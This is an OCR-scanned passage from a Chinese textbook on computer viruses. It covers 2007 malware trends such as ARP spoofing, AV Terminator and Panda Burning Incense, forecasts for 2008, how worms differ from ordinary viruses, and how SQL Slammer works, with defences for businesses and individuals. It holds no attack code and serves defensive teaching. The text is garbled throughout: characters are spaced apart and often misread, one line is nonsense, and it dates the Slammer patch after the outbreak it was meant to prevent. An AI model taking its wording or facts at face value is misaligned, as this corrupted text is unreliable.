2007 年 ARP 病毒 广为人知 ， 其 实在 更 早 的 时 候 ，ARP 攻击 行为 就 已 经 令 企 业 网 管 头 


疫 不 已 。 比 较 常见 的 是 部 分 “传奇 盗号 木马 ”， 


当局 域 网 中 某 台 计算 机 中 了 这 个 木马 ， 会 


向 局 域 网 发 送 大 量 ARP 数据 包 。 该 木马 对 局 域 网 的 影响 超出 了 盗号 造成 的 破坏 ,表现 为 网 
络 通信 时 断 时 通 ， 网 速 变 慢 。2007 年 的 ARP 欺骗 ， 已 经 不 再 局 限于 此 ， 通 过 劫持 网 络 会 
话 ， 可 以 在 正常 计算 机 上 网 时 ， 插 入 特定 恶意 代码 ， 强 令 计算 机 浏览 指定 网 站 或 下 载 病毒 


木马 。 


更 为 严重 的 是 ， 这 种 攻击 行为 已 经 扩散 到 从 客户 端 到 内 容 源 服务 器 之 间 的 所 有 环节 。 


攻击 者 利用 黑客 技术 入 侵 广域网 路 由 ， 导 致 某 地 


区 所 有 计算 机 访问 网 站 时 下 载 木 马 或 强行 


弹出 广告 。 攻 击 者 还 会 攻击 内 容 源 服务 器 所 在 的 局 域 网 ， 当 黑客 成 功 入 侵 内 容 源 服务 器 所 
在 网 段 的 某 台 主机 后 ， 再 利用 ARP 欺骗 劫持 会 话 ， 强 令 所 有 访问 该 内 容 源 的 客户 机 下 载 病 


毒 木马 或 者 弹出 广告 。 
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(> 和 雪人 管理 与 给 六 


潼 汀 车手 壮 ” 攻 潍 开 如上 村 才 到 当 到 


ARP 攻击 利用 的 是 网 络 传输 协议 的 漏洞 ， 只 有 修改 网 络 协议 才能 从 根本 上 解决 这 一 问 
题 ， 目 前 情况 下 只 能 做 到 缓解 ， 其 中 很 多 工作 要 靠 网 管 员 来 解决 。 普 通用 户 能 做 的 ， 是 利 
用 现 有 工具 尽 可 能 保护 自身 不 被 攻击 ， 或 者 不 要 感染 了 ARP 病毒 去 攻击 其 他 计算 机 。 

(4) 病毒 入 侵 “流程 化 ”。 

2007 年 ， 病 毒 攻 击 手 段 的 “流程 化 ”迹象 日 益 突出 。 大 量 病毒 进入 用 户 计算 机 后 首先 
终止 杀毒 软件 的 进程 ， 导 致 用 户 计算 机 失去 任何 安全 屏障 ， 其 次 ， 病 毒 将 肆 无 忌 翌 地 下 载 
大 量 盗号 类 木马 到 用 户 计 算 机 内 ; 最 后 驻 留 在 用 户 计算 机 内 的 盗号 木马 伺机 作案 ， 盗 取 用 
户 的 网 银 、 网 游 帐 号 密码 以 及 其 他 个 人 机 密 文件 。 

以 AV 终结 者 为 例 ， 该 病毒 进入 用 户 计算 机 后 ， 开 机 时 可 自动 加 载 ， 并 “绑架 ”安全 
软件 ， 令 大 量 杀 毒 软件 、 系 统管 理工 具 、 反 间谍 软件 不 能 正常 启动 。 同 时 监视 活动 窗口 的 
关键 字 ， 发 现 带 “ 杀 毒 ”等 字样 的 ， 就 立即 关闭 窗口 。 在 用 户 对 其 束手无策 的 情况 下 ，AV 
终结 者 疯狂 下 载 木 马 、 后 门 程序 ， 进 而 窃取 用 户 相关 资料 和 帐号 信息 。 

(5) 病毒 传播 突显 “长 尾 ” 理论。 

在 2007 年 度 的 10 大 病毒 ， 几 乎 无 一 例外 ， 都 具有 变种 多 的 特征 。 很 多 人 以 为 AV 终 
结 者 是 一 个 病毒 ,实际 上 是 一 大 批 具有 相似 现象 的 病毒 集合 。 在 2007 年 的 下 半年 很 多 用 户 
知道 了 Auto 病毒 ， 不 少 人 认为 这 仅 是 一 种 病毒 ， 而 事实 上 ， 利 用 U 盘 的 自动 运行 功能 传 
播 的 病毒 成 百 上 千 ， 这 些 病 毒 还 具有 AV 终结 者 的 特征 。 

AV 终结 者 、Auto 病毒 、 木 马 下 载 器 泛滥 ， 和 一 两 年 前 相 比 ， 病 毒 传播 的 趋势 发 生 了 
巨变 。 现 在 的 情况 是 ， 每 个 盗号 团伙 释放 的 木马 ， 只 影响 或 入 侵 部 分 网 络 ， 而 不 像 以 前 那 
样 尝试 入 侵 所 有 的 网 络 终端 。 因 为 是 人 为 释放 的 结果 ， 盗 号 团伙 可 以 很 容易 的 控制 木马 更 
新 版 本 ， 以 逃避 查 杀 。 位 于 这 个 “长 尾 ” 下 被 入 侵 的 计算 机 总 数 相当 庞大 。 

这 种 状态 下 ， 对 杀毒 软件 的 挑战 是 越 来 越 多 的 病毒 木马 难以 被 监测 网 捕获 ， 或 者 在 捕 
获 这 些 木 马 前 ， 这 些 木 马 已 有 较 长 的 生存 时 间 。 和 杀毒 软件 更 快 更 准 的 捕获 这 些 病 毒 ， 将 会 
给 用 户 提供 更 多 的 安全 。 

(6) 病毒 传播 方式 多 样 化 相互 模仿 严重 。 

病毒 /木马 制作 模仿 现象 严重 ， 一 些 病毒 制作 者 对 现 有 的 病毒 制作 技术 进行 重新 搭配 ， 
使 其 具有 更 大 的 危害 程度 。2007 年 公布 的 10 大 病毒 中 ，“ 灰 鸽子 ”对 应 “网 络 红娘 ”， 
“熊猫 烧香 ”对 应 “ 声 虫 ”， 他 们 只 是 出 现 的 时 间 不 同 ， 其 传播 的 方法 和 人 危害 程度 都 如 
出 一 略 。 

互联 网 的 高 速 发 展 带 来 病毒 制作 技术 的 不 断 翻新 , 但 制作 创意 更 易 被 病毒 作者 所 接受 。 
在 “熊猫 烧香 ”出 现时 间 和 “村 虫 ”病毒 出 现时 间 之 间 ， 也 同样 出 现 了 很 多 相似 的 病毒 ， 
如 “神奇 小 子 ”， 这 说 明 “ 熊 猫 烧香 ”的 病毒 制作 创意 受到 了 病毒 作者 的 追捧 ， 到 2007 年 
底 “ 球 虫 ”这 一 “改良 ”后 的 “熊猫 烧香 ” 差 一 点 就 成 为 毒 王 。 

近年 来 病毒 /木马 泛滥 的 主要 原因 是 制作 门槛 的 降低 ， 许 多 的 黑客 网 站 提供 了 相应 的 教 
学 方法 , 导致 VXer( 病 毒 作者 的 简称 ) 大 量 出 现 。 而 2008 年 通过 这 种 创意 模仿 并 改进 的 病毒 
的 增多 更 加 成 为 一 个 较 鲜 明 的 特点 ， 相 比 病毒 /木马 的 传播 和 破坏 在 技术 上 的 改进 ， 制 作 病 
毒 的 “创意 ”可 能 会 成 为 病毒 /木马 界 新 焦点 。 
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2) ”三 大 类 病毒 的 数量 明显 增多 

除了 上 述 六 大 特点 外 , 2007 年 , 各 类 病毒 百花 齐 放 ， 以 各 种 传播 方式 不 断 进攻 互联 网 
其 中 三 大 类 病毒 的 数量 明显 增多 。 

(1) 对 抗 杀毒 软件 和 破坏 系统 安全 设置 的 病毒 明显 增多 。 

对 抗 杀毒 软件 和 破坏 系统 安全 设置 的 病毒 以 前 也 有 , 但 2007 年 从 AV 终结 者 病毒 爆发 
之 后 ， 此 类 病毒 便 频 繁 出 现 。 主 要 是 由 于 大 部 分 杀毒 软件 加 大 了 查 杀 病毒 的 力度 ， 使 得 病 
毒 为 了 生存 而 必须 对 抗 杀 毒 软件 。 这 些 病毒 使 用 的 方法 也 多 种 多 样 ， 如 修改 系统 时 间 、 结 
束 杀 毒 软件 进程 、 破 坏 系统 安全 模式 、 禁 用 Windows 自动 升级 等 功能 。 

(2) 利用 可 移动 磁盘 传播 的 病毒 明显 增多 。 

随 着 可 移动 磁盘 技术 的 不 断 发 展 ， 以 及 可 移动 磁盘 价格 下 降 ， 拥 有 可 移动 磁盘 的 用 户 
也 大 量 增 加 ， 病 毒 也 开始 趁机 作乱 ， 除 了 蠕虫 ， 很 多 普通 的 木马 也 能 通过 可 移动 磁盘 进行 
传播 ， 主 要 方式 是 复制 一 个 病毒 体 和 一 个 Autorun.inf 文件 到 各 盘 。 如 果 用 户 插入 可 移动 磁 
盘 ， 可 移动 磁盘 将 会 被 感染 ， 若 再 将 其 插入 另 一 台 计 算 机 ，Autorun.inf 发 生 作用 ， 将 启动 
病毒 感染 计算 机 。 

(3) 感染 型 病毒 持续 增多 。 

感染 型 病毒 曾经 是 DOS 时 代 病 毒 的 特点 ， 进 入 Windows 之 后 ， 感 染 型 病毒 的 数量 下 
降 很 多 。 但 随 着 2006 年 的 “ 维 金 ”和 2007 年 初 的 “熊猫 烧香 ”病毒 “风靡 ”全 国之 后 ， 
从 金山 毒霸 病毒 监测 系统 显示 ， 感 染 型 病毒 不 断 增多 。 除 了 传统 的 感染 方式 ， 还 新 增 了 如 
“ 杜 虫 ”、“ 小 浩 ”等 覆盖 式 感染 ， 这 种 不 负责 任 的 感染 方式 将 导致 中 毒 用 户 计算 机 上 的 
被 感染 文件 无 法 修复 ， 带 来 毁灭 性 的 损坏 。 因 此 建议 用 户 使 用 正版 杀毒 软件 ， 并 开启 实时 
监控 ， 以 能 够 在 病毒 运行 起 来 之 前 将 其 查 杀 。 

2. 2007 年 底 对 2008 年 计算 机 病毒 技术 发 展 趋势 预测 


在 技术 日 新 月 异 的 今天 ， 病 毒 与 反 病 毒 软件 之 间 的 技术 斗争 愈演愈烈 ， 金 山 毒 霸 全 球 
反 病 毒 监测 中 心 预测 2008 年 计算 机 病毒 在 技术 方面 将 表现 为 三 大 趋势 。 

1) ”新 平台 上 的 尝试 

病毒 进入 新 经 济 时 代 后 ， 肯 定 是 无 孔 不 入 。 因 此 在 2008 年 ， 我 们 可 以 预 估 Vista 的 病 
毒 将 可 能 成 为 病毒 作者 的 新 宠 。 网 络 的 提速 让 病毒 更 加 的 泛滥 ， 当 我 们 的 智能 手机 进入 3G 
时 代 后 ， 手 机 平台 的 病毒 /木马 活动 会 上 升 。 软 件 漏洞 的 无 法 避免 ， 在 新 平台 上 的 漏洞 也 会 
成 为 病毒 最 主要 的 传播 条 件 。 

2) ” 反 主动 防 御 或 穿 透 主动 防御 的 新 技术 将 出 现 
在 未 来 的 2008 年 主动 防御 的 反 病毒 技术 必 将 成 为 主流 。 理 想 状 态 下, 主动 防御 能 处 理 
目前 所 有 的 已 知 病毒 。 但 软件 在 计算 机 中 始终 是 程序 而 不 是 智能 生物 ， 病 毒 作者 必 将 针对 
各 类 主动 防御 技术 研发 出 新 的 穿 透 技术 ， 就 像 近 两 年 来 采用 加 壳 技 术 来 躲避 特征 法 一 样 来 
躲避 主动 防御 技术 。 

3) ”网 络 欺诈 会 越 演 越 列 

网 络 欺诈 是 最 不 需要 技术 含量 的 ， 但 其 通用 性 和 易 用 性 将 成 为 一 些 网 络 骗 子 的 利刃 。 
2008 奥运 年 ， 奥 运 会 必 将 成 为 民众 关注 的 焦点 ， 同 时 如 此 高 度 吸 引 眼 球 的 社会 事件 也 将 成 
为 网 络 欺诈 最 好 的 诱饵 。 
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4.2.1 蠕虫 病毒 
1. 蠕虫 病毒 的 定义 


计算 机 病毒 自 出 现 之 日 起 , 就 成 为 计算 机 的 一 个 巨大 威胁 ,而 当 网 络 迅 速 发 展 的 时 候 ， 
蠕虫 病毒 引起 的 危害 才 开始 显现 ! 从 广义 上 定义 ， 凡 能 够 引起 计算 机 故障 ， 破 坏 计算 机 数 
据 的 程序 统称 为 计算 机 病毒 。 所 以 从 这 个 意义 上 说 ， 里 虫 也 是 一 种 病毒 ! 但 是 蠕虫 病毒 和 
- 般 的 病毒 有 着 很 大 的 区 别 。 对 于 蠕虫 ， 现 在 还 没有 一 个 成 套 的 理论 体系 。 一 般 认 为 ， 蠕 
虫 是 一 种 通过 网 络 传播 的 恶性 病毒 ， 它 具有 病毒 的 一 些 共性 ， 如 传播 性 、 隐 蔽 性 、 破 坏 性 
等 ， 同 时 也 具有 自己 的 一 些 特征 ， 如 不 利用 文件 寄生 (有 的 只 存在 于 内 存 中 )、 对 网 络 造成 
拒绝 服务 以 及 和 黑客 技术 相 结合 等 。 在 产生 的 破坏 性 程度 上 ， 里 虫 病 毒 也 不 是 普通 病毒 所 
能 比拟 的 ， 网 络 的 发 展 使 得 蠕虫 可 以 在 很 短 的 时 间 内 蔓延 整个 网 络 ， 造 成 网 络 瘫痪 。 

根据 使 用 者 情况 可 将 蠕虫 病毒 分 为 两 种 ， 一 种 是 面向 企业 用 户 和 局 域 网 ， 这 种 病毒 利 
用 系统 漏洞 ， 进 行 主动 攻击 ， 可 以 对 整个 互联 网 造成 瘫痪 性 的 后 果 ， 以 “红色 代码 ”,“ 尼 
姆 达 ”， 以 及 “sql 蠕虫 王 ” 为 代表 。 另 外 一 种 是 针对 个 人 用 户 的， 通过 网 络 (主要 是 电子 
邮件 ， 恶 意 网 页 形式 ) 迅 速 传 播 的 蠕虫 病毒 ， 以 “ 爱 虫 ”病毒 ，“ 求 职 信 ” 病 毒 为 代表 。 在 
这 两 种 中 ， 第 一 种 具有 很 大 的 主动 攻击 性 ， 而 且 爆发 也 有 一 定 的 突然 性 ， 但 相对 来 说 ， 查 
杀 这 种 病毒 并 不 是 很 难 。 第 二 种 病毒 的 传播 方式 比较 复杂 和 多 样 ， 少 数 利 用 了 微软 应 用 程 
序 的 漏洞 ， 更 多 的 是 利用 社会 工程 学 对 用 户 进行 欺骗 和 诱 使 ， 这 样 的 病毒 造成 的 损失 是 非 
常 大 的 ， 同 时 也 是 很 难 根除 的 ， 比 如 求职 信 病 毒 ， 在 2001 年 就 已 经 被 各 大 杀毒 厂商 发 现 ， 
但 直到 2002 年 底 仍然 排 在 病毒 危害 排行 榜 的 首位 。 

2. 蠕虫 病毒 与 一 般 病 毒 的 异同 

蠕虫 也 是 一 种 病毒 ， 因 此 具有 病毒 的 共同 特征 。 一 般 的 病毒 是 需要 寄生 的 ， 通 过 自己 
指令 的 执行 ， 将 自己 的 指令 代码 写 到 其 他 程序 体内 ， 而 被 感染 的 文件 就 被 称 为 “宿主 ”。 
例如 ，Windows 下 可 执行 文件 的 格式 为 PE 格式 (Portable Executable)， 当 感染 PE 文件 时 ， 
在 宿主 程序 中 ， 建 立 一 个 新 程序 段 ， 将 病毒 代码 写 到 新 程序 段 中 ， 修 改 程序 入 口 点 等 ， 这 
样 ， 宿 主 程序 执行 的 时 候 ， 就 先 执行 病毒 程序 ， 病 毒 程序 运行 完 之 后 ， 再 把 控制 权 交 给 宿 
主 原来 的 程序 指令 。 可 见 ， 病 毒 主要 是 感染 文件 ， 当 然 也 还 有 像 DIRI 这 种 链接 型 病毒 ， 
还 有 引导 区 病毒 。 引 导 区 病毒 是 感染 磁盘 的 引导 区 ， 如 果 是 软盘 被 感染 ， 这 张 软盘 用 在 其 
他 计算 机 上 后 ， 同 样 也 会 感染 其 他 计算 机 ， 所 以 传播 方式 也 是 感染 方式 。 

蠕虫 一 般 不 采取 利用 PE 格式 插入 文件 的 方法 ， 而 是 复制 自身 在 互联 网 环境 下 进行 传 
播 。 病毒 的 传染 主要 是 针对 计算 机 内 的 文件 系统 而 言 ， 而 蠕虫 病毒 的 传染 目标 是 互联 网 内 
的 所 有 计算 机 。 局 域 网 条 件 下 的 共享 文件 夹 、 电 子 邮 件 (E-maiD、 网 络 中 的 恶意 网 页 、 存 在 
着 大 量 漏洞 的 服务 器 等 都 是 蠕虫 传播 的 良好 途径 。 网 络 的 发 展 也 使 得 里 虫 病毒 可 以 在 几 个 
小 时 内 蔓延 全 球 。 而 且 蠕 虫 的 主动 攻击 性 和 突然 爆发 性 会 使 得 人 们 手足 无 策 。 表 4-1 给 出 
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了 蠕虫 病毒 和 普通 病毒 的 区 别 。 
表 4-1 蠕虫 病毒 和 普通 病毒 的 区 别 
普通 病毒 蠕虫 病毒 
存在 形式 寄存 文件 独立 程序 
传染 机 制 宿主 程序 运行 指令 代码 执行 直接 攻击 


传染 目标 本 地 文件 网 络 上 的 计算 机 
3. 蠕虫 造成 的 破坏 


1988 年 一 个 由 美国 Comell( 康 奈 尔 ) 大 学 研究 生 英 里 斯 编写 的 蠕虫 病毒 的 蔓延 致使 数 千 
台 计 算 机 停机 ， 蠕 虫 病毒 开始 现 身 网 络 ; 而 后 来 的 “红色 代码 ”，“ 尼 姆 达 ” 病 毒 疯狂 的 
时 候 ， 造 成 几 十 亿美 元 的 损失 ， 北 京 时 间 2003 年 1 月 26 日 ， 一 种 名 为 “2003 里 虫 王 ”的 
计算 机 病毒 迅速 传播 并 袭击 了 全 球 ， 致 使 互联 网 网 路 严重 堵塞 ， 作 为 互联 网 主要 基础 的 域 
名 服务 器 (DNS) 的 瘫痪 造成 网 民 浏 览 互联 网 网 页 及 收发 电子 邮件 的 速度 大 幅 减 级 ， 同 时 银 
行 自动 提 款 机 的 运作 中 断 ， 机 票 等 网 络 预订 系统 的 运作 中 断 ， 信 用 卡 等 收 付款 系统 出 现 故 
障 。 专 家 估计 ， 此 病毒 造成 的 直接 经 济 损失 至 少 在 12 亿美 元 以 上 。 而 作为 2007 年 网 络 病 
毒 之 首 的 “ 尼 姆 亚 (Worm.Nimaya)”( 又 名 “熊猫 烧香 ”) 采用 “熊猫 烧香 ”头像 作为 图 标 ， 
诱 使 计算 机 用 户 运行 ， 它 的 变种 会 感染 计算 机 上 的 EXE 可 执行 文件 , 被 病毒 感染 的 文件 图 
标 均 变 为 “熊猫 烧香 ”。 同 时 ， 受 感染 的 计算 机 还 会 出 现 蓝 屏 、 频 繁重 启 以 及 系统 硬盘 中 
数据 文件 被 破坏 等 现象 。 该 病毒 会 在 中 毒 计算 机 中 所 有 的 网 页 文件 尾部 添加 病毒 代码 。 
些 网 站 编辑 人 员 的 计算 机 如 果 被 该 病毒 感染 ， 上 传 网 页 到 网 站 后 ， 就 会 导致 用 户 浏览 这 些 
网 站 时 也 被 病毒 感染 。 其 带 来 的 经 济 损失 估计 达到 上 千 亿 人 民 币 。 

4. 蠕虫 病毒 的 特点 和 发 展 趋势 

蠕虫 病毒 的 特点 和 发 展 趋势 主要 体现 在 以 下 几 个 方面 。 

1) “利用 操作 系统 和 应 用 程序 的 漏洞 主动 进行 攻击 

此 类 病毒 主要 是 “红色 代码 ”、“ 尼 姆 达 ” 以 及 “求职 信 ” 等 。 由 于 正 浏览 器 的 漏 
洞 (Iframe Execcomand)， 使 得 感染 了 “ 尼 姆 达 ” 病 毒 的 邮件 在 不 去 手工 打开 附件 的 情况 下 
也 能 激活 病毒 ， 而 此 前 有 很 多 防 病毒 专家 也 一 直 认 为 ， 带 有 病毒 附件 的 邮件 ， 只 要 不 去 打 
开 附件 ， 病 毒 就 不 会 有 和 危害。“ 红 色 代 码 ” 是 利用 了 微软 IIS 服务 器 软件 的 漏洞 idq.dll 远 
程 缓存 区 溢出 ) 来 传播 。“sql 蠕虫 王 ” 病 毒 则 是 利用 了 微软 的 数据 库 系统 的 一 个 漏洞 进行 
大 肆 攻 击 。 

2) “传播 方式 多 样 

如 “ 尼 姆 达 ” 病 毒 和 “求职 信 ” 病 毒 ， 可 利用 的 传播 途径 包括 文件 、 电 子 邮 件 、Web 
服务 器 、 网 络 共享 等 。 

3) ”病毒 制作 技术 与 传统 的 病毒 不 同 

许多 新 病毒 是 利用 当前 最 新 的 编程 语言 与 编程 技术 实现 的 , 易于 修改 以 产生 新 的 变种 ， 
从 而 逃避 反 病 毒 软件 的 搜索 。 另 外 ， 新 病毒 利用 Java、ActiveX、VB Script 等 技术 ， 可 以 
潜伏 在 HTML 页 面 里 ， 在 上 网 浏览 时 被 触发 。 
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作 与 黑客 技术 相 结 合 

与 黑客 技术 相 结合 后 潜在 的 威胁 和 损失 更 大 。 以 “红色 代码 ”为 例 ， 感 染 后 的 计算 机 
在 Web 目录 的 \scripts 下 将 生成 一 个 root.exe 文件 ， 可 以 远程 执行 任何 命令 ， 从 而 使 黑客 再 
次 进入 。 

5. 网 络 蠕虫 病毒 分 析 和 防范 

蠕虫 和 普通 病毒 不 同 的 一 个 特征 是 蠕虫 病毒 能 够 利用 漏洞 , 这 里 的 漏洞 可 以 说 是 缺陷 ， 
我 们 分 为 两 种 ， 软 件 上 的 缺陷 和 人 为 上 的 缺陷 。 软 件 上 的 缺陷 ， 如 远程 溢出 、 微 软 正 和 
Outlook 的 自动 执行 漏洞 等 ,需要 软件 厂商 和 用 户 共同 配合 ， 进 行 不 断 的 升级 软件 。 而 人 为 
的 缺陷 ， 主 要 指 的 是 计算 机 用 户 的 玻 忽 ， 这 就 是 所 谓 的 社会 工程 学 (Social Engineering)， 当 
收 到 一 封 带 着 病毒 的 求职 信和 邮件 的 时 候 ， 大 多 数 人 都 会 报 着 好 奇 心 去 点 击 的 。 对 于 企业 用 
户 来 说 ， 威 胁 主要 集中 在 服务 器 和 大 型 应 用 软件 的 安全 上 ， 而 对 于 个 人 用 户 而 言 ， 主 要 是 
防范 第 二 种 缺陷 。 

1) “利用 系统 漏洞 的 恶性 蠕虫 病毒 分 析 

在 这 种 病毒 中 ， 以 “红色 代码 ”, “ 尼 姆 达 ” 和 “sql 蠕虫 王 ”为 代表 。 他 们 共同 的 特 
征 是 利用 微软 服务 器 和 应 用 程序 组 件 的 某 个 漏洞 进行 攻击 , 由 于 网 上 这 样 的 漏洞 比较 普遍 ， 
使 得 病毒 很 容易 传播 。 而 且 病 毒 攻击 的 对 象 大 都 为 服务 器 ， 所 以 造成 的 网 络 堵塞 现象 严重 。 

以 2003 年 1 月 26 日 爆发 的 “sql 蠕虫 王 ”为 例 ， 在 爆发 数 小 时 内 席卷 了 全 球 网 络 ， 造 
成 网 络 “大 赛车”。 亚 洲 国家 中 以 人 口上 网 普及 率 达 七 成 的 韩国 所 受 影 响 最 为 严重 ， 其 两 
大 网 络 业 KFT 及 韩国 电讯 公司 ， 系 统 都 陷入 了 瘫痪 ， 其 他 的 网 络 用 户 也 被 迫 断 线 。 更 为 严 
重 的 是 许多 银行 的 自动 取款 机 都 无 法 正常 工作 ， 据 美国 某 银行 统计 ， 该 行 的 13000 台 自 动 
柜员 机 都 无 法 提供 正常 提 款 服务 。 网 络 蠕虫 病毒 已 经 对 人 们 的 生活 产生 了 巨大 的 影响 。 

这 次 “sql 蠕虫 王 ” 攻 击 的 是 微软 数据 库 系 统 Microsoft SQL Server 2000, 利用 了 MS SQL 
2000 服务 远程 堆栈 缓冲 区 溢出 漏洞 ， 公 司 开发 的 商业 性 质 大 型 SQL Server 程序 监听 UDP 
的 1434 端口 ， 客 户 端 可 以 通过 发 送 消息 到 这 个 端口 来 查询 目前 可 用 的 连接 方式 (连接 方式 
可 以 是 命名 管道 也 可 以 是 TCP), 但 是 此 程序 存在 严重 漏洞 , 即 当 客户 端 发 送 超 长 数据 包 时 ， 
将 导致 缓冲 区 溢出 ， 黑 客 就 是 利用 该 漏洞 在 远程 计算 机 上 执行 自己 的 恶意 代码 。 

微软 在 2003 年 7 月 份 的 时 候 就 为 这 个 漏洞 发 布 了 一 个 安全 公告 ， 但 当 sql 蠕虫 爆发 的 
时 候 ， 依 然 有 大 量 的 装 有 MS SQL Server 2000 的 服务 器 没有 安装 最 新 的 补丁 ， 从 而 被 蠕虫 
病毒 所 利用 。 蠕 虫 病毒 通过 一 段 376 个 字 节 的 恶意 代码 ， 远 程 获得 对 方 主机 的 系统 控制 权 
限 , 取得 三 个 Win32 API 地 址 ，GetTickCount、Socket、Sendto, 接着 病毒 使 用 GetTickCount 
获得 一 个 随机 数 ， 进 入 一 个 死 循 环 。 在 该 循环 中 蠕虫 使 用 获得 的 随机 数 生成 一 个 随机 的 中 
地 址 ， 然 后 将 自身 代码 发 送 至 1434 端口 (Microsoft SQL Server 开放 端口 )， 该 蠕虫 传播 速度 
极 快 ， 使 用 广播 数据 包 方 式 发 送 自身 代码 ， 每 次 均 攻 击 子 网 中 所 有 可 能 存在 的 计算 机 。 由 
于 这 是 一 个 死 循 环 的 过 程 ， 发 包 密 度 仅 和 计算 机 性 能 和 网 络 带宽 有 关 ， 所 以 发 送 的 数据 量 
非常 大 。 该 蠕虫 对 被 感染 计算 机 本 身 并 没有 进行 任何 恶意 破坏 行为 ， 也 没有 向 硬盘 上 写 文 
件 ， 仅 仅 存 在 于 内 存 中 。 对 于 感染 的 系统 ， 重 新 启动 后 就 可 以 清除 蠕虫 ， 但 是 仍然 会 重复 
感染 。 由 于 发 送 数据 包 占 用 了 大 量 系统 资源 和 网 络 带宽 ， 形 成 Udp Flood， 感 染 了 该 蠕虫 的 
网 络 性 能 会 迅速 下 降 。 一 个 百 兆 网 络 内 只 要 有 一 两 台 计算 机 感染 该 蠕虫 病毒 就 会 导致 整个 
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网 络 访问 阻塞 。 

通过 以 上 分 析 可 以 知道 ， 此 蠕虫 病毒 本 身 除 了 对 网 络 产生 拒绝 服务 攻击 外 ， 并 没有 别 
的 破坏 措施 。 但 如 果 病 毒 编 写 者 在 编写 病毒 的 时 候 加 入 破坏 代码 ， 后 果 将 不 堪 设 想 。 

2) ”企业 防范 蠕虫 病毒 措施 

当前 ， 企 业 网 络 主要 应 用 于 文件 和 打印 服务 共享 、 办 公 自 动 化 系统 、 企 业 业 务 (MIS) 
系统 、Internet 应 用 等 领域 。 网 络 具有 便利 信息 交换 的 特性 ， 蠕 虫 病毒 也 充分 利用 网 络 快速 
传播 达到 其 阻塞 网 络 的 目的 。 企 业 在 充分 地 利用 网 络 进行 业务 处 理 时 ， 就 不 得 不 考虑 企业 
的 病毒 防范 问题 ， 以 保证 关系 企业 命运 的 业务 数据 的 完整 性 不 被 破坏 。 

企业 防治 蠕虫 病毒 需要 考虑 几 个 问题 : 病毒 的 查 杀 能 力 ， 病 毒 的 监控 能 力 ， 新 病毒 的 反应 
能 力 。 而 企业 防毒 的 一 个 重要 方面 是 管理 和 策略 。 推 荐 企业 防范 蠕虫 病毒 使 用 的 策略 如 下 。 

(1) 加 强 网 络 管理 员 安 全 管理 水 平 ， 提 高 安全 意识 。 由 于 蠕虫 病毒 利用 系统 漏洞 进行 
攻击 ， 所 以 需要 在 第 一 时 间 内 保持 系统 和 应 用 软件 的 安全 性 ， 保 持 各 种 操作 系统 和 应 用 软 
件 的 更 新 。 各 种 漏洞 的 出 现 ， 使 得 安全 不 再 是 一 劳 永 逸 的 事 ， 而 作为 企业 用 户 而 言 ， 所 经 
受 攻击 的 危险 也 是 越 来 越 大 ， 要 求 企业 的 管理 水 平和 安全 意识 也 越 来 越 高 。 

(2) 建立 病毒 检测 系统 。 能 够 在 第 一 时 间 内 检测 到 网 络 异常 和 病毒 攻击 。 

(3) 建立 应 急 响 应 系统 ， 将 风险 减少 到 最 小 。 由 于 蠕虫 病毒 爆发 的 突然 性 ， 可 能 在 病 
毒 发 现 的 时 候 已 经 蔓延 到 了 整个 网 络 ， 所 以 在 这 种 情况 下 ， 建 立 一 个 紧急 响应 系统 是 很 有 
必要 的 ， 即 能 在 病毒 爆发 的 第 一 时 间 提 供 解决 方案 。 

(4) 建立 灾难 备份 系统 。 对 于 数据 库 和 数据 系统 ， 必 须 采 用 定期 备份 ， 多 机 备份 措施 ， 
防止 意外 灾难 下 造成 数据 丢失 。 

(5) 对 于 局 域 网 而 言 ， 可 以 采用 以 下 一 些 主要 手段 。@ 在 因特网 接 入 口 处 安装 防火 墙 
式 防 杀 计 算 机 病毒 产品 ， 将 病毒 隔离 在 局 域 网 之 外 。@ 对 邮件 服务 器 进行 监控 ， 防 止 带 毒 
邮件 进行 传播 。@ 对 局 域 网 用 户 进行 安全 培训 。@ 建 立 局 域 网 内 部 的 升级 系统 ， 包 括 各 种 
操作 系统 的 补丁 升级 、 各 种 常用 的 应 用 软件 升级 、 各 种 杀毒 软件 病毒 库 的 升级 等 。 

3) ”对 个 人 用 户 产生 直接 威胁 的 蠕虫 病毒 

在 以 上 分 析 的 蠕虫 病毒 中 ， 只 对 安装 了 特定 的 微软 组 件 的 系统 进行 攻击 ， 而 对 广大 个 
人 用 户 而 言 ， 是 不 会 安装 IIS( 微 软 的 因特网 服务 器 程序 ,可 以 被 允许 在 网 上 提供 Web 服务 ) 
或 者 是 庞大 的 数据 库 系统 的 。 因此 上 述 病 毒 并 不 会 直接 攻击 个 人 用 户 的 计算 机 (当然 能 够 间 
接 的 通过 网 络 产生 影响 )， 但 接 下 来 分 析 的 蠕虫 病毒 ， 则 是 对 个 人 用 户 威 胁 最 大 ， 同 时 也 是 
最 难以 根除 的 ， 造 成 的 损失 也 更 大 的 一 类 蠕虫 病毒 。 

对 于 个 人 用 户 而 言 , 威胁 大 的 蠕虫 病毒 采取 的 传播 方式 一 般 为 电子 邮件 (E-maiD) 以 及 恶 
意 网 页 等 。 

对 于 利用 E-mail 传播 的 蠕虫 病毒 来 说 ， 通 常 利用 的 是 社会 工程 学 (Social Engineering)， 
即 以 各 种 各 样 的 欺骗 手段 诱惑 用 户 点 击 的 方式 进行 传播 。 

恶意 网 页 确切 地 讲 是 一 段 黑 客 破坏 代码 程序 ， 它 内 赃 在 网 页 中 ， 当 用 户 在 不 知情 的 情 
况 下 打开 含有 病毒 的 网 页 时 ， 病 毒 就 会 改作。 这 种 病毒 代码 镶嵌 技术 的 原理 并 不 复杂 ， 所 
以 会 被 很 多 怀 有 不 良 企图 的 人 所 利用 ， 甚 至 在 很 多 黑客 网 站 上 出 现 了 关于 用 网 页 进行 破坏 
的 技术 的 论坛 ， 提 供 破坏 程序 代码 的 下 载 ， 从 而 造成 了 恶意 网 页 的 大 面积 泛滥 ， 也 使 越 来 
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越 多 的 用 户 遭 受 损失 。 

对 于 恶意 网 页 , 常常 采取 VB Script 和 Java Script 编程 的 形式 , 由 于 编程 方式 十 分 简单 ， 
所 以 在 网 上 非常 流行 。 

VB Script 和 Java script 是 由 微软 操作 系统 的 WSH(Windows Scripting HostWindows 脚 
本 主机 ) 解 析 并 执行 的 ， 由 于 其 编程 非常 简单 ， 所 以 此 类 脚本 病毒 在 网 上 传播 疯狂 。 疯 狂 一 
时 的 “ 爱 虫 ”病毒 就 是 一 种 Vbs 脚本 病毒 ， 然 后 伪装 成 邮件 附件 诱惑 用 户 点 击 运行 ， 更 为 
